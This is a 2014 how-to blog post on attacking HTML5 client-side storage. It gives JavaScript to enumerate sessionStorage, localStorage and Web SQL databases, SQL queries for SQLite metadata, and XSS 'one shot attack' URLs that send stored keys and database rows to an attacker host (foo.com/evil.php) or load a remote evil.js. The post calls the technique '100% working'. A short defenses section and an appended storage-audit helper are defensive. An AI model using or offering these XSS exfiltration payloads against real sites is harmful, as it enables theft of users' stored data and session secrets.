Client-side Storage using HTML5, really secure or just an abuse?

Nov 20, 2014 | Howtos, HTML, Programming, Storages

HTML5 introduced several new ways to store large amounts of data on the user's PC through the browser (use Chromium or Chrome to see how this works). Attackers can steal or modify this sensitive data, online or offline. If a web application that uses this kind of client-side storage is vulnerable to XSS, an attack payload can read or modify the content of known storage keys on the victim's computer. If the web application loads data or code from local storage, it is also quite powerful to inject malicious code there, because it will be executed every time the web application reads it back.

Working technique (100% working technique; I got success while doing this, you just have to use your brain):

Storage Object Enumeration

var ss = "";
// Read sessionStorage keys by index so only stored keys are listed, not the Storage API's own properties
for (var i = 0; i < sessionStorage.length; i++) {
    ss += sessionStorage.key(i) + " ";
}
var ls = "";
for (var j = 0; j < localStorage.length; j++) {
    ls += localStorage.key(j) + " ";
}

Database Object Enumeration

var db = "";
// Web SQL: collect the names of global properties whose class is Database
for (var name in window) {
    if (Object.prototype.toString.call(window[name]) === "[object Database]") {
        db += name + " ";
    }
}

Extracting Database Metadata

SELECT name FROM sqlite_master WHERE type='table'
SELECT sql FROM sqlite_master WHERE name='table_name'
SELECT sqlite_version()

One Shot Attack:

http://blah_blah.com/page.php?name=<script>document.write('<img src="http://foo.com/evil.php?name=' %2B globalStorage[location.hostname].mykey %2B '">');</script>

http://blah_blah.com/page.php?name=<script>db.transaction(function (tx) { tx.executeSql("SELECT * FROM client_tb", [], function(tx, result){ document.write('<img src="http://foo.com/evil.php?name=' %2B result.rows.item(0)['col_data'] %2B '">'); }); });</script>

http://example.com/page.php?name=<script src=http://foo.com/evil.js></script>


Defenses

Website: Avoid saving sensitive data on the user's machine, and clear the client-side storage whenever possible (for example on logout).

Web Browser: Users should regularly check the content of the HTML5 client-side storage saved by their browser and delete what they do not need.
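As an added example that is not part of the original post, here is a small audit helper that a site (or a user, from the browser console) can run over localStorage or sessionStorage to find entries that look like secrets and clear them. The key-name pattern, the JWT-shape check and the in-memory Storage stand-in are my own assumptions, chosen so the code also runs outside a browser.

```javascript
// Added example (not from the original post): audit a Web Storage object for
// entries that look like they hold sensitive data, so a site can verify it is
// not persisting secrets client-side, and remove them.
// Works with any object exposing length, key(i), getItem and removeItem
// (the window.localStorage / sessionStorage API).

// Key names that commonly indicate secrets (assumption: illustrative list only).
const SENSITIVE_KEY_PATTERN = /(token|session|passw|secret|auth|jwt|cookie|ssn|card)/i;
// Values shaped like a JSON Web Token: three base64url segments joined by dots.
const JWT_VALUE_PATTERN = /^[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+$/;

// Returns [{ key, reasons }] for every entry that should not live in client-side storage.
function auditStorage(storage) {
  const findings = [];
  for (let i = 0; i < storage.length; i++) {
    const key = storage.key(i);
    const value = storage.getItem(key) || "";
    const reasons = [];
    if (SENSITIVE_KEY_PATTERN.test(key)) reasons.push("sensitive key name");
    if (JWT_VALUE_PATTERN.test(value)) reasons.push("JWT-shaped value");
    if (reasons.length) findings.push({ key, reasons });
  }
  return findings;
}

// Removes every flagged entry; collects keys first so removal does not shift indices.
function clearFlagged(storage) {
  const flagged = auditStorage(storage).map((f) => f.key);
  for (const key of flagged) storage.removeItem(key);
  return flagged;
}

// Constructed stand-in for window.localStorage (Map-backed, same method names).
class MemoryStorage {
  constructor() { this.map = new Map(); }
  get length() { return this.map.size; }
  key(i) { const keys = Array.from(this.map.keys()); return i < keys.length ? keys[i] : null; }
  getItem(k) { return this.map.has(k) ? this.map.get(k) : null; }
  setItem(k, v) { this.map.set(k, String(v)); }
  removeItem(k) { this.map.delete(k); }
}

// Constructed sample contents: one harmless preference next to two entries
// a site should never leave in client-side storage.
function sampleStorage() {
  const s = new MemoryStorage();
  s.setItem("theme", "dark");
  s.setItem("authToken", "abc123");
  s.setItem("profile", "eyJhbGciOiJub25lIn0.eyJzdWIiOiIxIn0.sig");
  return s;
}
```

In a real page, call `auditStorage(window.localStorage)` and `auditStorage(window.sessionStorage)` instead of the stand-in.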

LSO Storage Locations (I only know the Linux location; not a Windows user, unfortunately :p)

Linux:

/home/$user/.macromedia/Flash_Player/#SharedObjects

Written By Rishi Giri
